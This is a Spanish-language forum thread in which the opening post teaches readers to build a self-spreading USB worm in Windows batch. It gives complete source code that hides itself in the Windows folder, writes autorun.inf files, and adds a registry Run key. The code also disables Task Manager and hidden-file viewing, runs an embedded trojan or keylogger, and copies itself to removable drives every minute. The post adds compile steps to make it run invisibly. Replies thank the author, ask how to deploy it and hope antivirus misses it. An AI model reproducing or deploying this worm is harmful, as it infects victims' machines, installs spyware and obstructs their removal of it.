elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: (TUTORIAL) Aprende a emular Sentinel Dongle By Yapis


+  Foro de elhacker.net
|-+  Informática
| |-+  Tutoriales - Documentación (Moderadores: r32, ehn@)
| | |-+  HOW-TO Crear Gusano de Memorias USB en BATCH 		0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 3 4 Ir Abajo Respuesta Imprimir
Autor Tema: HOW-TO Crear Gusano de Memorias USB en BATCH  (Leído 36,318 veces)
octalh


Desconectado Desconectado

Mensajes: 518


"El sueño de la razón produce monstruos"


Ver Perfil WWW
HOW-TO Crear Gusano de Memorias USB en BATCH
« en: 5 Marzo 2008, 04:47 am »
HOW-TO CREA TU WORM EN BACTH


Herramientas a utilizar:

Quick_Batch_File_Compiler_3.1.5.0
que pueden descargar del siguiente enlace
http://rapidshare.com/files/97127487/Quick_Batch_File_Compiler_3.1.5.0.rar.html

Bueno en esta ocasión les tratare de explicar en breves palabras como crear su propio worm programado en batch.

Considero que es una buena respuesta para todos aquellos que buscan programas ya hechos que hagan estas funciones, cuando resulta mas fácil aprender a programarse el suyo.

Como se que muchos de aqui nunca en su vida han programado algo, a excepción de unos cuantos bats, pues queria poner de ejemplo un código para que puedan realizar sus propias pruebas y aprender por si solos.

Aclaro que si eres programador, este manual definitivamente no te servirá, pero si eres alguien curioso que quiere aprender y no tiene idea de programación, este manual te puede ser de gran ayuda.

Empezare dando una breve explicación de lo que hará nuestro worm y las funciones que realiza

Básicamente lo que hará nuestro script es lo siguiente

*copiarse a si mismo a una carpeta en windows
*crear el autorun que posteriormente será copiado en la memoria extraible USB
*añadirse al inicio de windows
*alterar registro de windows para cancelar opciones del sistema
*ejecuta tu troyano, keylogger o lo que quieras
*si encuentra una unidad donde copiarse, se copia junto con su autorun
*se añade atributos de oculto, sistema y solo lectura
*espera aprox. 60 segundos y repite el ciclo


de esta forma dotamos a nuestro programa de la habilidad de propagarse por si solo.
con un poco de ayuda de la victima claro esta :xD

Bien ahora que sabes lo que el gusano hará te paso a explicar brevemente las funciones que utilice en el código

SET  Sirve para definir una variable, por ejemplo
SET perro=firulais
de esa forma podemos cambiar el nombre del perro sin tener que hacerlo en cada una de las expreciones donde hagamos referencia a firulais.

ECHO Este comando basicamente sirve para "imprimir" en pantalla algun texto.

">" Este simbolo lo utilizamos para redirigir la salida de un comando, o tambien para comparar valores.

En este caso la salida del comando ECHO la dirigimos hacia un archivo de texto

IF NOT EXIST Este condicional se utiliza de la siguiente manera
SI NO EXISTE ... ENTONCES HAS ESTO
sirve para realizar acciones siempre y cuando se cumpla o no una condicion

Los demas son comandos basicos de la shell de windows CMD.EXE


Como funcionara el worm?
bien lo que haremos sera utilizar la herramientas antes mencionada para compilarlo y obtener un EXE que se ejecute de manera OCULTA, de esa forma no tendremos problemas con la tipica pantalla negra de los batch


el codigo del worm lo explique en cada sección.

Código
  1. @ECHO OFF
  2. REM          _______..___________.     ___      .______      
  3. REM         /       ||           |    /   \     |   _  \     
  4. REM        |   (----``---|  |----`   /  ^  \    |  |_)  |    
  5. REM         \   \        |  |       /  /_\  \   |      /     
  6. REM     .----)   |       |  |      /  _____  \  |  |\  \----.
  7. REM     |_______/        |__|     /__/     \__\ | _| `._____|
  8. REM     ____    __    ____   ______   .______      .___  ___. 
  9. REM     \   \  /  \  /   /  /  __  \  |   _  \     |   \/   | 
  10. REM      \   \/    \/   /  |  |  |  | |  |_)  |    |  \  /  | 
  11. REM       \            /   |  |  |  | |      /     |  |\/|  | 
  12. REM        \    /\    /    |  `--'  | |  |\  \----.|  |  |  | 
  13. REM         \__/  \__/      \______/  | _| `._____||__|  |__| 
  14. REM
  15. REM    ____  ____  _________  ____  ____  ____  ____  ____  ____ 
  16. REM   ||B ||||Y ||||       ||||O ||||C ||||T ||||A ||||L ||||H ||
  17. REM   ||__||||__||||_______||||__||||__||||__||||__||||__||||__||
  18. REM   |/__\||/__\||/_______\||/__\||/__\||/__\||/__\||/__\||/__\|
  19. REM                                                      
  20. REM
  21. REM DESCRIPCION: Codigo en batch que copia un archivo "X" a "X" unidad
  22. REM                   [   OCTALH@GMAIL.COM   ]                                                 
  23. REM
  24.  
  25. REM +++++++++++ EDITA AQUI EL NOMBRE DEL WORM COMPILADO ++++++++++++++++
  26.  
  27.                  SET WORMORIGINAL=juego.exe
  28.                  REM NOMBRE QUE TIENE ACTUALMENTE TU BATCH COMPILADO
  29.                  SET WORM=1044404.EXE
  30.                  REM NOMBRE QUE TENDRA EN LA MEMORIA USB
  31.  
  32. REM +++++++++++ EDITA AQUI EL NOMBRE DEL WORM COMPILADO ++++++++++++++++
  33.  
  34. SET AUTORUNORIGINAL=%WINDIR%\14785\WINUPDATE.DLL
  35. REM DIRECCION COMPLETA DEL AUTORUN ESCONDIDO
  36.  
  37. SET AUTORUN=autorun.inf
  38. REM NOMBRE QUE TENDRA EN LA MEMORIA USB
  39.  
  40. REM CREA UN DIRECTORIO EN LA CARPETA WINDOWS
  41. MD "%WINDIR%\14785"
  42.  
  43. REM AQUI SE CREA EL ARCHIVO AUTORUN
  44. ECHO [AUTORUN] >%AUTORUNORIGINAL%
  45. ECHO open=%WORM% >>%AUTORUNORIGINAL%
  46. ECHO shell\1=abrir >>%AUTORUNORIGINAL%
  47. ECHO shell\1\Command=%WORM% >>%AUTORUNORIGINAL%
  48. ECHO shell\2\=explorar >>%AUTORUNORIGINAL%
  49. ECHO shell\2\Command=%WORM% >>%AUTORUNORIGINAL%
  50. ECHO shellexecute=%WORM% >>%AUTORUNORIGINAL%
  51.  
  52. REM COPIA EL WORM A EL DIRECTORIO DE WINDOWS PARA OCULTARLO
  53. COPY %WORMORIGINAL% "%WINDIR%\14785\SYSTEMSHELL.exe"
  54. REM EJECUTA TU SERVER
  55. START %MYFILES%\server.exe
  56.  
  57. REM SE AGREGA AL INICIO DEL SISTEMA
  58. REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v wuaclt.exe /t REG_SZ /d "%WINDIR%\14785\SYSTEMSHELL.exe" /f
  59. REM SE DESACTIVA EL ADMINISTRADOR DE TAREAS
  60. REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d "1" /f
  61. REM SE DESACTIVA LA OPCION DE VER ARCHIVOS OCULTOS
  62. REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\NOHIDDEN /v CheckedValue /t REG_DWORD /d "2" /f
  63.  
  64. :CHEKARWORM
  65.  
  66. REM VERIFICA LA EXISTENCIA DEL WORM
  67.  
  68. IF NOT EXIST "D:\%WORM%" GOTO COPIARWORM
  69. IF NOT EXIST "E:\%WORM%" GOTO COPIARWORM
  70. IF NOT EXIST "F:\%WORM%" GOTO COPIARWORM
  71. IF NOT EXIST "G:\%WORM%" GOTO COPIARWORM
  72. IF NOT EXIST "H:\%WORM%" GOTO COPIARWORM
  73. IF NOT EXIST "I:\%WORM%" GOTO COPIARWORM
  74. IF NOT EXIST "J:\%WORM%" GOTO COPIARWORM
  75.  
  76.  
  77. :COPIARWORM
  78.  
  79. REM COPIA EL WORM Y LE ASIGNA ATRIBUTOS DE SOLO LECTURA
  80. REM SISTEMA Y OCULTO.
  81.  
  82. COPY "%WINDIR%\14785\SYSTEMSHELL.exe" "E:\%WORM%"
  83. ATTRIB +S +H +R "E:\%WORM%"
  84. COPY "%WINDIR%\14785\SYSTEMSHELL.exe" "F:\%WORM%"
  85. ATTRIB +S +H +R "F:\%WORM%"
  86. COPY "%WINDIR%\14785\SYSTEMSHELL.exe" "G:\%WORM%"
  87. ATTRIB +S +H +R "G:\%WORM%"
  88. COPY "%WINDIR%\14785\SYSTEMSHELL.exe" "H:\%WORM%"
  89. ATTRIB +S +H +R "H:\%WORM%"
  90. COPY "%WINDIR%\14785\SYSTEMSHELL.exe" "I:\%WORM%"
  91. ATTRIB +S +H +R "I:\%WORM%"
  92. COPY "%WINDIR%\14785\SYSTEMSHELL.exe" "J:\%WORM%"
  93. ATTRIB +S +H +R "J:\%WORM%"
  94.  
  95. REM COPIADO DEL AUTORUN Y ASIGANCION DE ATRIBUTOS
  96.  
  97. COPY "%AUTORUNORIGINAL%" "E:\%AUTORUN%"
  98. ATTRIB +S +H +R "E:\%AUTORUN%"
  99. COPY "%AUTORUNORIGINAL%" "F:\%AUTORUN%"
  100. ATTRIB +S +H +R "F:\%AUTORUN%"
  101. COPY "%AUTORUNORIGINAL%" "G:\%AUTORUN%"
  102. ATTRIB +S +H +R "G:\%AUTORUN%"
  103. COPY "%AUTORUNORIGINAL%" "H:\%AUTORUN%"
  104. ATTRIB +S +H +R "H:\%AUTORUN%"
  105. COPY "%AUTORUNORIGINAL%" "I:\%AUTORUN%"
  106. ATTRIB +S +H +R "I:\%AUTORUN%"
  107. COPY "%AUTORUNORIGINAL%" "J:\%AUTORUN%"
  108. ATTRIB +S +H +R "J:\%AUTORUN%"
  109.  
  110. GOTO LOOP
  111.  
  112.  
  113. :LOOP
  114. REM UNA ESPECIE DE SLEEP XD DE PROX 60 SEGUNDOS
  115. ping 127.0.0.1 -n 60
  116. GOTO CHEKARWORM
  117.  
  118.  

bien ahora explicare como utilizar el codigo.

lo primero sera fijarce en esta parte del codigo

Código:
                 SET WORMORIGINAL=juego.exe
                 REM NOMBRE QUE TIENE ACTUALMENTE TU BATCH COMPILADO
                 SET WORM=1044404.EXE
                 REM NOMBRE QUE TENDRA EN LA MEMORIA USB

Es indispensable que la variable WORMORIGINAL=juego.exe tenga el mismo nombre que el worm unaves compilado con QUICK BATCH FILE COMPILER

Tambien verifica esta parte del codigo

Código:
REM EJECUTA TU SERVER
START %MYFILES%\server.exe

aqui donde dice server.exe tiene que tener el mismo nombre que el archivo a adjuntar en el QUICK BATCH FILE COMPILER.

Para compilar tu worm solo tienes que copiar el codigo en el QUICK BATCH FILE COMPILER

te debe quedar algo asi


Ahora haremos que se ejecute de forma oculta, para eso nos vamos a project, optiones y activamos la opcion Gost aplication



Ahora debes agregar tu aplicacion a propagar, puede ser un server de troyano, keylogger etc etc...
para eso vamos a la pestaña Embedded Files y damos click en el icono de la cruz verde y posteriormente añadimos nuestra aplicacion, tambien pueden agregar un icono personalizado en esta pestaña.



recuerda que este archivo se debe llamar como lo indicaste en
Código:
REM EJECUTA TU SERVER
START %MYFILES%\server.exe

ahora precionamos F9 para compilarlo y listo!!, ahora tienes tu propio worm programado en batch.


Bien con esto llegamos al final de esta pequeña guia, espero que haya sido de tu agrado y cualquier cosa puedes comentar en el foro.


SALU2 y suerte
« Última modificación: 5 Marzo 2008, 19:37 pm por octalh » En línea
Stone_FREE_


Desconectado Desconectado

Mensajes: 376



Ver Perfil
Re: HOW-TO Crear Gusano de Memorias USB en BATCH
« Respuesta #1 en: 5 Marzo 2008, 08:39 am »
Excelente aporte... mas tarde lo pruebo  ;)

Con respecto a las imágenes que no salen, es porque imageshack parece que ha bloqueado las imágenes que van a este foro. Sube tus imágenes a http://tinypic.com/ y ahí ya se podrán ver  ::)
En línea
You are the Owner of your Life, your Fears and your Dreams ...
_LooSeR_

Desconectado Desconectado

Mensajes: 48



Ver Perfil
Re: HOW-TO Crear Gusano de Memorias USB en BATCH
« Respuesta #2 en: 5 Marzo 2008, 14:56 pm »
Muy bueno octalh ;) Muchas gracias por el aporte en cuanto tenga tiempo a mirarlo!

Saludos
En línea
marxall

Desconectado Desconectado

Mensajes: 68



Ver Perfil
Re: HOW-TO Crear Gusano de Memorias USB en BATCH
« Respuesta #3 en: 5 Marzo 2008, 15:21 pm »
Tenia ganas de encontrar por aqui un manual tan bueno como este sobre un worm, pero perdonar mi ginorancia,porque llevo poco tiempo en esto.¿ el codigo que tengo que copiar y luego pegar en el Quick_Batch_File_Compiler es todo el codigo que pone al principio? me explico, ¿ el codigo entero incluido eso de START WORM (en letras grandes),lo de By octalh,etc...?  gracias de antemano.

pd: muy muy buen manual, sobre todo para los que empiezan como yo ;)
En línea
rayluch

Desconectado Desconectado

Mensajes: 21



Ver Perfil
Re: HOW-TO Crear Gusano de Memorias USB en BATCH
« Respuesta #4 en: 5 Marzo 2008, 17:17 pm »
¡Saludos! Muchas gracias por molestarte en hacer una guía (siendo que yo hace 4 días aparecí preguntando por programas que hicieran esto :-))

Respecto a las dudas que tengo:
¿Sólo hay que modificar la parte de los nombres (server, autorun, etc) y el nombre de la carpeta (esto lo he hecho yo como opcional)?

Código:
:LOOP
REM UNA ESPECIE DE SLEEP XD DE PROX 60 SEGUNDOS
ping 127.0.0.1 -n 60
GOTO CHEKARWORM

¿Esto se modifica?

Código:
REM AQUI SE CREA EL ARCHIVO AUTORUN
ECHO [AUTORUN] >%AUTORUNORIGINAL%
ECHO open=%WORM% >>%AUTORUNORIGINAL%
ECHO shell\1=abrir >>%AUTORUNORIGINAL%
ECHO shell\1\Command=%WORM% >>%AUTORUNORIGINAL%
ECHO shell\2\=explorar >>%AUTORUNORIGINAL%
ECHO shell\2\Command=%WORM% >>%AUTORUNORIGINAL%
ECHO shellexecute=%WORM% >>%AUTORUNORIGINAL%

¿Y esto?

Saludos.
« Última modificación: 5 Marzo 2008, 23:11 pm por rayluch » En línea
[Zero]
Wiki

Desconectado Desconectado

Mensajes: 1.082


CALL DWORD PTR DS:[0]


Ver Perfil WWW
Re: HOW-TO Crear Gusano de Memorias USB en BATCH
« Respuesta #5 en: 5 Marzo 2008, 17:20 pm »
Muy bueno el tutorial, y aprovecho para decir que de nada sirve copiar y pegar el código de octalh, si quieres aprender tendrás que esforzarte en entenderlo, aunque no es necesario entenderlo todo a la primera, vete acostumbrando a ver códigos y intentar comprenderlos.

Cita de: Stone_FREE_ en  5 Marzo 2008, 08:39 am
Con respecto a las imágenes que no salen, es porque ¡mageshack parece que ha bloqueado las imágenes que van a este foro. Sube tus imágenes a http://tinypic.com/ y ahí ya se podrán ver  ::)
Si, no se porque imageshack esta bloqueando las imagenes, a mi me pasó lo mismo, y no es sólo en este foro, en otros foros ya pasaba.
Saludos
En línea

“El Hombre, en su orgullo, creó a Dios a su imagen y semejanza.”
Nietzsche
Gabrunix

Desconectado Desconectado

Mensajes: 177


Gabrunix web http://www.gabrunix.cl.kz


Ver Perfil WWW
Re: HOW-TO Crear Gusano de Memorias USB en BATCH
« Respuesta #6 en: 5 Marzo 2008, 17:38 pm »
excelente tuto respecto a las imágenes usen xs.to  ;)
En línea
octalh


Desconectado Desconectado

Mensajes: 518


"El sueño de la razón produce monstruos"


Ver Perfil WWW
Re: HOW-TO Crear Gusano de Memorias USB en BATCH
« Respuesta #7 en: 5 Marzo 2008, 19:46 pm »
Gracias respecto a las imagenes ya las subi a otro servidor  :rolleyes:

bueno por lo de algunas dudas que tenian el

Código:
REM AQUI SE CREA EL ARCHIVO AUTORUN
ECHO [AUTORUN] >%AUTORUNORIGINAL%
ECHO open=%WORM% >>%AUTORUNORIGINAL%
ECHO shell\1=abrir >>%AUTORUNORIGINAL%
ECHO shell\1\Command=%WORM% >>%AUTORUNORIGINAL%
ECHO shell\2\=explorar >>%AUTORUNORIGINAL%
ECHO shell\2\Command=%WORM% >>%AUTORUNORIGINAL%
ECHO shellexecute=%WORM% >>%AUTORUNORIGINAL%

es para crear el autorun.inf que posteriormente sera copiado a la memoria usb

solo que si te confundes en %WORM% y %AUTORUNORIGINAL%, recuerda que estas son variables que definimos mas arriba que en este caso %AUTORUNORIGINAL% es igual a %WINDIR%\14785\WINUPDATE.DLL y WORM es igual a 1044404.EXE.


Código:
:LOOP
REM UNA ESPECIE DE SLEEP XD DE PROX 60 SEGUNDOS
ping 127.0.0.1 -n 60
GOTO CHEKARWORM

ahora esta parte es una forma de poner un timer o un sleep, es para hacer tiempo..
si ya se que ese comando hace un ping  :xD, pero el ping lo hara 60 veces y si tomamos en cuenta que aprox cada peticion de ping tarda 1 segundo, pues es una forma de esperar 60 segundos.

sirve para que el gusano verifique unidades aprox cada 60 segundos
En línea
rayluch

Desconectado Desconectado

Mensajes: 21



Ver Perfil
Re: HOW-TO Crear Gusano de Memorias USB en BATCH
« Respuesta #8 en: 6 Marzo 2008, 00:23 am »
Se te ha olvidado poner que se copie en el D y que cambie sus atributos, ¿no?

Ya he conseguido que funcione y le he cambiado un par de cosas. Gracias por hacer un código tan sencillo y claro.

Saludos.
En línea
DarkCangri

Desconectado Desconectado

Mensajes: 65



Ver Perfil
Re: HOW-TO Crear Gusano de Memorias USB en BATCH
« Respuesta #9 en: 6 Marzo 2008, 00:45 am »
este manual esta muy bueno sobretodo q se puede modificar al gusto del cliente.
esperemos q no sea detectado por los antivirus.

Mauro si me estas leyendo, no pongas este manual en tu blog porque hay un monton de gente de kaspersky que anda metida en tu blog y despues lo van a detectar y mandarselo a los de nod32 tambien.
En línea
Páginas: [1] 2 3 4 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Gusano en Batch! (Codigo hecho)
Análisis y Diseño de Malware 		richi_clarinet 1 7,306 Último mensaje 8 Septiembre 2010, 01:44 am
por kj_
[BATCH] Gusano autorreplicante
Análisis y Diseño de Malware 		Meine programmen 3 4,296 Último mensaje 17 Julio 2012, 13:40 pm
por ApOkAlizE
El CSIC logra crear por primera vez memorias magnéticas que no se borran
Noticias 		wolfbcn 1 1,671 Último mensaje 29 Enero 2014, 01:00 am
por Wickown
Crear gusano en python
Análisis y Diseño de Malware 		<Trocutor> 8 8,710 Último mensaje 13 Junio 2017, 21:00 pm
por MCKSys Argentina
ayuda con el code de mi nuevo gusano en batch
Análisis y Diseño de Malware 		**Aincrad** 0 2,859 Último mensaje 18 Junio 2017, 20:41 pm
por **Aincrad**
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines